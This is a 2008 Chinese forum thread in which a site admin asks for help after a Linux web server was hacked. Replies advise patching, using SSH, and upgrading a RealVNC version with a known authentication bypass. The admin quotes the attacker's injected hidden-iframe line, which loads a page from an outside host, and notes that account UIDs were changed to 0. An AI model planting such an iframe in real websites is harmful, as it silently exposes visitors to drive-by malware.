免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 数据安全 求助!linux+apache2+tomcat+mysql被黑,被加入了css代 ...
最近访问板块 发新帖
查看: 3773 | 回复: 9
打印 上一主题 下一主题

求助!linux+apache2+tomcat+mysql被黑,被加入了css代码 [复制链接]

vilevirusvinny

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-05-12 18:50 |只看该作者 |倒序浏览
web服务器配置为 linux+apache2+tomcat+mysql,今天发现被黑了,现象为VNC不能连接上,用Sniffer pro软件监测到该服务器IP不断上传数据,网站无法访问。重起机器之后网站恢复,但用客户机访问该网站首页时IE下面显示当前链接的栏中会有XXX w.cao360.com XXX等字样一闪而过(XXX是我没看清楚的部分),同时主页上放有个黄条提示安装RealNetwork什么的。看起来是访问我们的网站之前刷新了一遍别人的网站。打开网站文件夹搜索cao360字样发现在 /网站根目录/css/scr.js中被添加了一行代码:
document.write('<iframe height=0 width=0 src="http://w.cao360.com/z7.htm?id=9999"></iframe>');
删除这行代码之后网站恢复正常,但从图形界面进入用户管理界面发现:
games operator 这两个系统默认的用户ID 被修改成0
我自己常用的帐户ID本来应该是500,也被修改成了0
其他问题尚未发现
在路由器系统中的防火器设置中为该服务器开了www telnet pop smtp四个tcp端口,linux服务器自带的防火墙没有启用,没有打补丁,linux版本为 Redhat EL4 AS,root帐户和我自己的帐户都设置有强密码

请各位高手帮我看看,是哪个环节出了问题,该如何避免黑客再次修改网站,还有如何恢复已经被修改的用户ID,不胜感激!!!

[ 本帖最后由 vilevirusvinny 于 2008-5-13 09:13 编辑 ]
唯三色彩

论坛徽章:
0
2 [报告]
发表于 2008-05-13 11:19 |只看该作者
首先RHEL AS4没打补丁
Linux跟Windows一样,不打补丁一样会被人黑的
RHEL如果不买服务,升级不方便
肯定是利用系统漏洞进行攻击的;
帐户权限,改/etc/passwd文件应该就可以
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
唯三色彩

论坛徽章:
0
3 [报告]
发表于 2008-05-13 11:23 |只看该作者
如果是Web程序的漏洞,可能也要结合系统的一些漏洞才能拿到系统级权限;
RHEL4以后,有一个很好的安全工具,SElinux,不过配置起来很麻烦
研究一下PAM的使用还是很有帮助的。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
Cyberman.Wu

论坛徽章:
0
4 [报告]
发表于 2008-05-15 17:06 |只看该作者
如果是远程的服务器一定不要用telnet管理,由于是明文密码,再强也没用。现在许多机房里面都无法做到绑定ARP可每个服务器划分VLAN,一旦广播域中有任何一台计算机中了招,就可以用ARP来欺骗交换机抓包,密码是有可能泄露的。
应该用SSH来管理。

你给出的日志是已经登录之后的了,这个是哪个用户的?

[ 本帖最后由 Cyberman.Wu 于 2008-5-15 17:09 编辑 ]
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
vilevirusvinny

论坛徽章:
0
5 [报告]
发表于 2008-05-16 10:06 |只看该作者
因为我知识有限,还不会设置SSH。我这里是一个小型企业,路由器外面就没有网络了,直接就是internet的上端路由器了。我贴出来的记录是root操作历史,在/root/.bash_history中,这是全部的了
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
vilevirusvinny

论坛徽章:
0
6 [报告]
发表于 2008-05-16 10:19 |只看该作者
请高手帮忙指点一下,黑客为什么要修改那几个用户的UID,是什么用意?我是直接把UID改回来吗?因为服务器上有网站和邮件系统,全是手工编译安装的,重装一次非常麻烦。该怎么做善后操作?先谢谢各位了
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
xuchen16

论坛徽章:
0
7 [报告]
发表于 2008-07-29 14:03 |只看该作者

求助!linux+apache2+tomcat+mysql被黑,被加入了css代码

你查看下系统的vnc的版本是不是vnc-server-4.1.1,这个版本的vnc有远程认证绕过漏洞。

    RealVNC VNC Server就是一款远程终端控制软件,它采用的RFB(远程帧缓冲区)协议允许客户端与服务端协商合适的认证方法,由于协议的实现上存在设计错误,远程攻击者可以绕过认证,无需口令实现对服务器的访问

   要想避免黑客通过该漏洞入侵计算机系统,最简单的方法就是将RealVNC的版本升级到最新的版本(受影响系统:RealVNC 4.1.1;不受影响系统:RealVNC Personal Edition 4.2.3、RealVNC Free Edition 4.1.2、RealVNC Enterprise Edition 4.2.3),或者通过其他的VNC来取代RealVNC,比如UltraVNC、TightVNC等。当然也可以用其他的远程控制软件代替,比如RemotelyAnywhere、DameWare NT Utilities、NetOp Remote Control等。   除此以外,安装网络防火墙也是不错的选择。因为正规的远程控制软件都是通过正向连接进行服务端程序控制的,我们只要使用防火墙封堵客户端程序连接的端口,比如RealVNC使用的端口为5900,就可以将其他的非法连接阻挡在防火墙之外。不过这样的话,你要使用RealVNC进行远程连接只有换一个让人不容易发现的端口了。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
kelzz

论坛徽章:
0
8 [报告]
发表于 2008-07-29 15:35 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
cqintime

论坛徽章:
0
9 [报告]
发表于 2008-07-30 20:54 |只看该作者
用什么VNC嘛???ssh多好的。。。命令方式全部搞定。。有安全。。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP